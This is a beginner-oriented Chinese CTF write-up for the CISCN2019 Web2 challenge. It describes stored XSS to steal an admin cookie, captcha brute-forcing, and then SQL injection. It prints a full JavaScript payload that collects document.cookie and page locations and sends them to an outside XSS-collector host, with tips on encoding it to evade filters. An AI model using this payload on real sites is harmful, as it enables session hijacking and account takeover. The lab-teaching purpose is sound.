[CISCN2019 華東北賽區]Web2 WriteUp
阿新 • • 發佈:2020-10-12
[CISCN2019 華東北賽區]Web2 WriteUp
前言
這是一道xss結合sql注入的題目,當時在寫的時候想了很久,最後看大佬的題解覺得不太適合我這樣的新手來看,於是心血來潮想寫一篇小白向的WriteUp。
一.開啟環境
發現是一個網站,有投稿和反饋功能。這個比較重要。
我們很容易想到,可以投稿,然後點選稽核,管理員就會來到我們的頁面,稽核我們的投稿
這樣的話我們可以構造惡意程式碼,讓管理員進去,從而竊取管理員的cookie,進入後臺。
開啟投稿和反饋介面,隨意註冊一下登入:
確定是xss。
二.構造XSS程式碼
構造所需要的xss程式碼並不需要我們自己去寫。
然後註冊登入,建立一個專案就好:
自己可以研究一下那一摞程式碼都是幹嘛的,我們這裡並不需要明白。
複製以下程式碼
(function(){(new Image()).src=‘http://xss.buuoj.cn/index.php?do=api&id=T6A1kl&location=’+escape((function() {try{return document.location.href}catch(e){return ‘’}})())+’&toplocation=’+escape((function(){try{return top.location.href}catch(e){return ‘’}})())+’&cookie=’+escape((function(){try{return document.cookie}catch(e){return ‘’}})())+’&opener=’+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:’’}catch(e){return ‘’}})());})()
然後把”(new Image()).src“改成“window.location.href”
再利用指令碼:
進行轉碼繞過保護。
複製payload_final,
傳遞到投稿介面。
檢視頁面原始碼
複製如圖的網址,開啟反饋介面貼上,在前面加上
http://web。
接下來需要考慮驗證碼,這裡涉及到雜湊碰撞和生日攻擊。簡單來說就是暴力破解;指令碼如圖所示:
在md5[0:6]後面加上你的頁面所顯示的6位字元
執行等待。
填入。
接下來我們去自己建立的xss專案裡看。
複製cookie,利用火狐的外掛修改自己的cookie
很容易找到後臺網址後面加上admin.php
有了管理員許可權後是這樣的
好,我們已經成功進入後臺,出現了一個查詢框
slq注入。
結束。